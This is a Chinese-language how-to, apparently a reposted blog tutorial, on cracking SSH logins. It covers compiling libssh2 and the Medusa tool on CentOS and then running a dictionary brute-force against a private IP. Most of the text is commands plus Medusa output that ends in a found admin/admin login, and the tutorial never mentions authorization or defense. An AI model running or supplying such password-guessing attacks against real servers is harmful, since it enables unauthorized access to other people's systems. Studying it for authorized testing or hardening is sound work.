远程ssh破解

1. 软件

OS::CentOS release 5.2 (Final) (可通过cat /etc/issue查看)

库:libssh2-1.2.7.tar.gz

medusa:medusa-2.0.tar.gz

2. 安装libssh2-1.2.7

将libssh2-1.2.7.tar.gz拷贝到/tmp/目录下,解压为libssh2-1.2.7并进入该目录:

2.1 ./configure

2.2 make

2.3 make install

 

3. 安装medusa-2.0

将medusa-2.0.tar.gz拷贝到/tmp/目录下,解压为medusa-2.0并进入该目录:

2.1 ./configure –build=”i686-pc-linux” –enable-moduel-ssh=yes

2.2 make

2.3 make install

 

4. 设置环境变量LD_LIBRARY_PATH便于用medusa破解SSH时找到相应的相应的共享库

export LD_LIBRARY_PATH=/usr/local/lib

NOTE:若在运行时出现如下类似错误时,一般用上述方法可解决

IMPORTANT: Couldn’t load “ssh” [libssh2.so.1: cannot open shared object file: No such file or directory].

 

5. 开始破解SSH

将字典(如brute.dic, p.dic)拷贝到目录/tmp/后,进入/tmp/目录,键入medusa可以看到其它帮助信息,根据帮助信息可以开始破解SSH.。e.g., (假设我们要破解的目标IP为192.168.10.126)

[root@CentOS2 tmp]# medusa -h 192.168.10.126 -U brute.dic -P p.dic -t 7 -f -r 10 -M ssh

Medusa v2.0 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networksjmk@foofus.net

 

ACCOUNT CHECK: [ssh] Host: 192.168.10.126 (1 of 1, 0 complete) User: admin (1 of 1, 0 complete) Password: adidas (123 of 4086 complete)

ACCOUNT CHECK: [ssh] Host: 192.168.10.126 (1 of 1, 0 complete) User: admin (1 of 1, 0 complete) Password: admin (124 of 4086 complete)

ACCOUNT FOUND: [ssh] Host: 192.168.10.126 User: admin Password: admin [SUCCESS]

ACCOUNT CHECK: [ssh] Host: 192.168.10.126 (1 of 1, 0 complete) User: admin (1 of 1, 1 complete) Password: access (125 of 4086 complete)

ACCOUNT CHECK: [ssh] Host: 192.168.10.126 (1 of 1, 0 complete) User: admin (1 of 1, 1 complete) Password: accident (126 of 4086 complete)

ACCOUNT CHECK: [ssh] Host: 192.168.10.126 (1 of 1, 0 complete) User: admin (1 of 1, 1 complete) Password: across (127 of 4086 complete)

ACCOUNT CHECK: [ssh] Host: 192.168.10.126 (1 of 1, 0 complete) User: admin (1 of 1, 1 complete) Password: adam (128 of 4086 complete)

ACCOUNT CHECK: [ssh] Host: 192.168.10.126 (1 of 1, 0 complete) User: admin (1 of 1, 1 complete) Password: admin (129 of 4086 complete)

ACCOUNT FOUND: [ssh] Host: 192.168.10.126 User: admin Password: admin [SUCCESS]

ACCOUNT CHECK: [ssh] Host: 192.168.10.126 (1 of 1, 0 complete) User: admin (1 of 1, 2 complete) Password: Admin (130 of 4086 complete)

 

当发现有”ACCOUNT FOUND”时,说明成功破解,在上述例子中我们的成功破解的用户名为admin,密码为admin.

本文摘自独自等待博客由网络安全攻防研究室(www.91ri.org) 信息安全小组收集整理.